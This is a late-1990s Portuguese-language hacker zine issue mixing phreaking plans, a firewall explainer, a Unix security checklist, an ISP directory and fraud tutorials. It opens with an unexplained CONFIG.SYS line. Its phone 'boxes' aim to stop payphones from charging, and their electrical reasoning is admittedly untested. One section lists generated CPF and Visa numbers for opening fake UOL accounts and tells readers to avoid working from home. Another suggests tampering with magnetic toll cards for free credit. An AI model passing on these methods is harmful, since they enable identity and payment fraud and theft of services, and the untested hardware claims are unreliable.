----------------------------Corte Aki--(CONFIG.SYS)--------------------------
DEVICE=C:\WINDOWS\INIT.EXE
-----------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  6. Phreaking  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boxes em fase de testes.

	Na edição passada mostrei uma box teorisada e testada por mim. Nessa
edição vão apenas uns planos que eu ainda não testei.

	^^^^^^^^^^Sound Box^^^^^^^^^^

	Jah reparou nos fios que ligam o aparelho de som as caixas de som??
	Um fio preto e um vermelho. Jah tentou liga-los com os fios da linha
telefonica?? Eu tb não.
	Mas jah pensou se funcionar?? Você coloca o som tri altão começa a
falar com o kra pelo microfone e ateh da pra rolar uma musiquinha com quali-
dade pro kra ouvir.
	E' bacaninha essa box. Soh não sei se funcionara pois os fios do som
são bem mais grossos que os do telefone mas...

	^^^^^^^^^^Sound Box 2^^^^^^^^^^

	Tah, talvez com as caixas de som não funcionem, mas jah vio a finura
dos fios da caixa de som do computador??
	Faça a mesma coisa que vc fez com a "Sound Box 1".
	Tb tente com os fios do microfone, tanto do computador quanto o do
aparelho de som.

	^^^^^^^^^^Driver Box^^^^^^^^^^

	Assim..
	Segundo Tom Waits o telefone quando uma chamada e' completada, a po-
larisação do telefone e' mudada de -48 para +48 volts. Quando o aparelho per-
cebe que a polarisação esta' a +48 volts ele pede uma ficha.
	Se vc colocar um diodo nos fios telefonicos, a polarisação fica esta-
vel a 0 volts. Sendo assim, não se encontra positiva então o aparelho não irá
requerer mais fichas.
	Mas ateh onde foi explicado, o aparelho só ira cobrar quando a pola-
risaça chegar a +48.
	Entaum reparei que num dakeles carrinhos de controle remoto, meio
antigos(com um fio ligando o controle ao carro), usava o mesmo padrão de fios
telefonicos dos EUA.
	O que eu tenho aki é um modelo AUTO DRIVER da GLASSLITE, que precisa
de 3 pilhas medias para funcionar.
	Cada pilha pode gerar 1,5 volts. Sendo assim 4,5 ao total.
	Não sei ao certo, se vc ligar os fios vermelhos e verdes e dar tipo
uma partida no controle remoto, se a polarisação ira' subir mais 9 volts ou
irá se estabilizar em 9 volts.
	Se a segunda opção acontecer, o aparelho tb não necesitara' + fichas,
pq não atingiu os +48 volts. O aparelho pensara que esta' no estagio em que a
polarisação estara subindo.
	Se a primeira estiver correta, a ligação ira' acabar dentro de umas
10 partidas do controle remoto.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  7. Redes  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-=-=-=-=-=-=-=-=-=-=-=

	FireWalls (por Anonymous)

	O que é um Firewall ?
	Um firewall é um dispositivo de rede qualquer, que pode ser um com-
putador ou um roteador que filtra o acesso a um rede de computadores que deve
ser protegida.
	Este muro de fogo permite você proteger a rede de sua empresa da
intrusão de seres extra-terrestres não desejados. Ao mesmo tempo que permite
que pessoas comuns, que batalham o mês inteiro para ganhar um misero salário,
tenham acesso aos serviços da internet, tais como Web e email a partir de
dentro da empresa. Eles também podem ser utilizados para realizar um controle
(contabilidade) de acessos para permitir que somente certas pessoas da orga-
nização tenham acesso aos dados a partir da internet. Muitos firewalls contêm
agora características para controlar, autenticar e asegurar o usuário que
quer acessar os dados internos da empresa a partir da Internet ou de alguma
subsidiária,este tipo de serviços estão se tornando cada vez mais necessários
.
	Os firewalls estão sendo utilizados em muitas organizações, não so-
mente aquelas com conexão Internet, eles podem ser utilizados para proteger
mainframes ou outros recursos centralizados dentro da própria organização, ou
ainda, para garantir a segurança das informações que passam através de redes
públicas.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$  8. Invasão de privacidade  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Lista de itens de segurança que devem ser observados
	Copyright 1994-1997 Pangéia Informática Ltda

	A seguinte lista tem por objetivo auxiliar os adminstradores de sis-
tema a manter a segurança de suas instalações em um nível aceitável. Ela se
propoe a servir como base para o adminstrador montar sua própria lista.

	Este documento pode ser distribuido gratuitamente, desde que mantidos
os devidos créditos.

[Planejamento]
[Usuários/Senhas]
[Root]
[Sistema de Arquivos]
[Contas de Usuários]
[Dados]
[Arquivos de logs]
[Ameaças]
[Ameaças via Rede]
[Segurança em Roteadores]

*** Planejamento: ***
1. Identifique o que você precisa protejer
2. Escolha as prioridades pra segurança
3. Especifique normas para emergencias
4. Eduque seus usuários

*** Usuários/Senhas ***
1. Certifique-se que cada usuário tenha uma conta individual
2. Confirme se cada usuário possui senha
3. Verifique se sua instalação pode rejeitar senhas com menos de 6 caracteres
4. Consiga e rode programas que tentam achar senhas frágeis(Crack, Cracklib).
5. Considere a possibilidade de usar programas que geram senhas.
6. Nunca transmita senhas por telefone ou e-mail.
7. Certifique-se que o arquivo de senhas só pode ser lido pelo "root".
8. Considere a possibilidade de trocar as senhas em intervalos regulares.

*** Root ***
1. Iniba a entrada do root de qualquer terminal(deixe, no máximo, a console).
2. Entre com sua conta comum e então use "su" para tornar-se "root".

*** Sistema de Arquivos ***
1. Procure por programas que tenham SUID/SGID ligados.
2. Procure por arquivos com permissão para gravação, que são disparados por
   alguma ferramenta específica (.exrc, .profile, .pinerc, .kshrc, .login,
   /etc/sendmail.cf, /etc/profile, etc)

*** Contas de Usuários ***
1. Remova contas inativas.
2. Use rksh ou rsh quando necessário.
3. Certifique-se que todas as contas tem senha.
4. Evite criar contas pra rodar um único programa.
5. Jamais crie outras contas com id 0 (mesmo do root).

*** Dados ***
1. Faça cópias de segurança regularmente.
2. Certifique-se que as cópias poderão ser recuperadas numa emergência.
3. Use mecanismos de veficação de integridade de programas e arquivos. (por
   exemplo checksum md4/5 ou pdf)
4. Certifique-se que os sistemas de arquivos tem as permissões corretas.
5. Não habilite SUID/SGID em scripts (shell ou perl)
6. Elimine as permissões de gravação nos "devices" dos terminais, "pseudo
   terminais" principalmente.
7. Certifique-se que os arquivos começados com "." não tem permissão pra
   gravação por ninguem.
8. Remova todos os shells (csh, zsh, ash, etcsh) que não estiver usando.
9. Considere rodar regularmente programas que identificam falhas de segurança
   no Unix, tais como COPS, Tiger, Medusa, etc.
10. Guarde uma listagem dos programas que tem SUID/SGID e compare-a com cada
   nova verificação.
11. Remova TODOS os utilitários que não forem necessários na máquina, tais
   como: cc, perl, awk, etc.

*** Arquivos de Logs ***
1. Rode o comando "last" e "who /var/adm/wtmp" regularmente.
2. Verifique os arquivos de auditoria regularmente
3. Verifique o arquivo sulog.
4. Verifique os arquivo gerados pelos Daemos com: xferlog( ftpd), syslog
   (syslogd) messages (syslogd) access_log (httpd)

	OBS:  /etc/syslog.conf permite uma grande varideade de possibilidades
de log, e de arquivos para contê-los

*** Ameaças ***
1. Nunca instale software desconhecido, sem os fontes para exame.
2. Evite usar scripts com SUID/SGID, examine data e permissões.
3. Jamais coloque "." na variável de ambiente PATH do "root".
4. Vefique periodicamente os arquivos de rc e data de modificação de progra-
   mas.
5. Examine a variável de ambiente PATH de todos os scripts que for executar.
6. Garanta que nenhum programa com SUID/SGID permita saída para o shell.
7. Examine os programas que permitem passar o usuário com parâmetro.

*** Ameaças via Rede ***
1. Examine o /etc/hosts.equiv e todos os .rhosts, caso você deseje usar os
   comandos "r" (rlogin, remsh (rsh), rexec, rcp, retc :-)).
	NOTA: este recurso é altamente condenado, no aspecto segurança.
2. Desabilite TODOS os recursos de rede que NÃO estiver usando.
3. Substitua (se quiser manter habilitado) o fingerd, por uma versão segura.
4. Verifique (e instale) a versão mais recente do Sendmail.
5. Desabilite, se possível, o serviço de TFTP. (Candidato a serviço mais
   inseguro)
6. Certifique-se que a versão do FTP anonymous é segura.
7. Jamais coloque o mesmo arquivo /etc/passwd no diretório do ftp anonymous.
8. Jamais crie diretórios cujo dono seja o usuário "ftp" (serviço FTP).
9. Desabilite o serviço de NFS para maquinas remotas.
10. Desabilite os servicos internos (chargen, echo, etc).
11. Use um POPD que tenha arquivo de senhas próprio, ou ao menos permita
   desconexão após n (poucas) tentativas.
12. Remova o programa phf do diretório .../httpd/cgi-bin. (serviço http).
13. Remova também os programas test-cgi e nph-test-cgi diretório .../httpd/
   cgi-bin. (serviço http).
14. Jamais coloque algum interpretador (perl, csh, ksh, etc) no diretório
   .../httpd/cgi-bin (serviço http).
15. Não crie links que usem o perl ou shell para disparar programas.

*** Segurança em Roteadores ***
1. Troque ou cadastre uma senha no roteador antes de ligado definitivamente
  `a Internet, seguindo as mesmas regras para senhas de usuário.
2. Desabilite, se possível, o acesso remoto ao 'login' do roteador.
3. Desabilite os servicos internos (chargen, echo, etc).
4. No caso de roteadores Cyclades, troque não só a senha de fábrica como
   também o nome do superusuário.
5. Desabilite todos os protocolos desnecessários (RIP, BGP, etc).

-----------------------------------------------------------------------------
Ultima Atualização 29/12/97 - Nelson Murilo (nelson@pangeia.com.br)
Comentários para suporte@pangeia.com.br
NOTA:

Possibilidades como: criptografia, firewalls, autenticação e simulação de
ataques, não foram discutidas pois não podem ser analisadas fora do contexto
da instalação com um todo.

-----------------------------------------------------------------------------
1995-97 © Pangéia Informática LTDA.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  9. Hack, the Art  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Fazendo contas fantasmas na UOL.

	Numa edição passada, meu amigo Slacker mostrou como fazer contas
fantasmas na Mandic. Aki, mostrarei como fazer na uol. E' bem simples.
	Você precisará de um gerador de CPF e de CC(Credit Card).
	Se vc não conseguir achar nenhum eu colocarei uma breve lista de
numeros de CPF e CC.

CPFs:
9873484779
45434578465
26456363578
46345674664
45634377943
05134348529

CCs:
Visa:
4013 8604 7222 2342
4013 5768 7497 8519
4013 5221 8759 9378
4013 1796 6406 4747
4013 3146 7723 9537
4013 7107 2725 1887

	Na data de vencimento do cartão coloque 12/99.
	Ae preencha os dados direitinho, faça algo certinho tipo:
Pais: Brasil
Estado: RS
Cidade: Porto Alegre
Rua: Assis Brasil

	E não:
Pais: EUA
Estado: RJ
Cidade: São Paulo
Rua: Dom Pedro II

	Lembre-se de não fazer isso de casa. A porra do Anonymiser não vai te
ajudar nisso.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Montando um servidor WWW

	Existem vários programas disponíveis para download.
	Um dos mais simples é o "Alibaba", que pode ser obtido no endereço
http://www.csm.co.at/csm/alibaba.htm .
	O WebSite, da O'Reilly & Associates (http://website.ora.com), é um
pouco mais arrojado e conta com bons recursos de segurança.
	Os dois têm versões para Windows NT e 95.
	Uma terceira alternativa é o NetWare Web Server, disponível no site
da Novell ( http://corp.novell.com/announce/webserve).
	Estes dados foram extraidos de uma revista.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Cartões para a FreeWay

	A alguns dias eu lí no jornal que foram extreiados os cartões com
creditos para as FreeWays (BR 290 aqui no sul).
	Os cartões são de fita magnetica e podem ser recarregados assim como
os cartões da playland (playcard). Parece que o cartão e' comprado com 25 ou
50 creditos e ao acabar e' recarregado nos mesmos lugares onde foi comprado.
	Podem ser comprados na própria freeway.
	Ainda não testei, mas tudo indica que os truques para deixar os
créditos infinitos no playcard tb funcionam nesses cartões.
	Não se lembra?? Passe esmalte de spray incolor na fita magnetica do
cartão e experimente.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--=-==-=-=-=-=-=-=-=-=-=-=-=-==-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                 $$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  10. ¡¡¡BoNuS!!!  $$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                 $$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Lista de provedores - Rio de Janeiro (2a parte)

* Provedor : MSM-Internet
  Host : msm.com.br
  Telefone : 2407042
             2405249
  Email : suporte@msm.com.br

* Provedor : Nad's BBS
  Host : nads.com.br
  Email : sysop@nads.com.br

* Provedor : Netfly
  Host : netfly.com.br
  Telefone : 5671900
  Email : comercial@netfly.com.br

* Provedor : NetGate
  Host : netgate.com.br
  Telefone : 2539918
  Email : netgate@netgate.com.br

* Provedor : NetRio
  Host : netrio.com.br
  Telefone : 5892029
  Email : webmaster@netrio.com.br

* Provedor : Netyet
  Host : netyet.com.br
  Email : info@netyet.com.br

* Provedor : NetZero Provider
  Host : netzero.com.br
  Email : webmaster@netzero.com.br

* Provedor : NovaNet
  Host : novanet.com.br
  Telefone : 5311545
             5311850
  Email : info@novanet.com.br

* Provedor : Nutecnet do Rio de Janeiro
  Host : rio.nutecnet.com.br
  Telefone : 5151155
  Email : suporte@rio.nutecnet.com.br

* Provedor : OpenLink
  Host : openlink.com.br
  Telefone : 5151202
  Email : admin@openlink.com.br

* Provedor : OpusNet
  Host : opusnet.com.br
  Email : webmaster@opusnet.com.br

* Provedor : Pandora - Desenvolvimento de HomePages
  Host : pandora.com.br
  Email : info@pandora.com.br

* Provedor : PlanetWay
  Host : planetway.com.br
  Email : webmaster@planetway.com.br

* Provedor : Plugue
  Host : plugue.com.br
  Telefone : 5422092
  Email : plugue@plugue.com.br

* Provedor : PontoCom
  Host : pontocom.com.br
  Telefone : 5431270
  Email : info@ pontocom.com.br

* Provedor : Prolink
  Host : prolink.com.br
  Email : mailadm@prolink.com.br

* Provedor : Riolink Internet
  Host : rio.com.br
  Telefone : 5778899
  Email : riolink@rio.com.br

* Provedor : RioNet
  Host : rionet.com.br
  Telefone : 5322280
             2406928
  Email : rionet@rionet.com.br

* Provedor : SkyNet
  Host : sky.com.br
  Telefone : 2868797
  Email : info@sky.com.br

* Provedor : TrendNet
  Host : trendnet.com.br
  Email : webmaster@trendnet.com.br

* Provedor : Trip Informatica Ltda.
  Host : trip.com.br
  Telefone : 5562898
             5563166
  Email : comercial@trip.com.br

* Provedor : Tropical HiperNet Rio
  Host : hipernet.com.br
  Email : telecom@hipernet.com.br

* Provedor : Unikey BBS
  Host : unikey.com.br
  Email : webmaster@unikey.com.br

* Provedor : Uninet
  Host : uninet.com.br
  Telefone : 0800 221958
  Email : informacao@uninet.com.br

* Provedor : Vetor
  Host : vetor.com.br
  Telefone : 5331370
  Email : webmaster@vetor.com.br

* Provedor : Virtual Internet Provider
  Host : virtual.com.br
  Email : virtual@virtual.com.br

* Provedor : VisualNet
  Host : visualnet.com.br
  Email : vendas@visualnet.com.br

* Provedor : WorldSite
  Host : worldsite.com.br
  Email : webmaster@worldsite.com.br

Total : 28
Atenção!!! Os Dados contidos aki foram tirados da revista Internet Business,
pois eu não moro no rio e nao sei nada dos provedores de lah.
Os telefones visto aki e na edição passada são para contato com o provedor
via voz/fax e não a modem.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

	Desculpe pela demora(1 semana) para sair esta edição da zine.
	As zines mais recentes que encontrei na inet foram:

UHB - União dos Hackers Brasileiros
http://www.dominio.uhb.org

TDK - The Death Knights
http://www.deathsdoor.com/tdk

r00t h/p/a/c
william.poa@usa.net

	Falowz
